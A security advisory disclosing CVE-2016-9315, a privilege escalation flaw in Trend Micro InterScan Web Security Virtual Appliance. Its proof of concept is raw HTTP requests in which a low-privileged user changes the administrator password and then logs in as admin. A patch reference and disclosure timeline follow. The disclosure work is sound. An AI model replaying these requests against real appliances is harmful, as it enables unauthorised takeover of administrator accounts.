Trendmicro InterScan Privilege Escalation Vulnerability

Vulnerability Details

Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-269: Improper Privilege Management
Impact: Privilege Escalation
Attack vector: HTTP
CVE-ID: CVE-2016-9315

Vulnerability Description

Any authenticated user can execute administrative functionality

Technical Description

1. Login as least privileged user role.

POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logon.jsp
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:02:24 GMT
Connection: close

2. Use session identifier to run administrator functionality to change admin password.

POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 280

CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location: https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:37 GMT
Connection: close

3. Login as admin

POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M
Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

uid=admin&passwd=korelogic2

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:54 GMT
Connection: close

Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:

https://success.trendmicro.com/solution/1116672

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

Disclosure Timeline

2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.12 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.

Proof of Concept

See 3. Technical Description.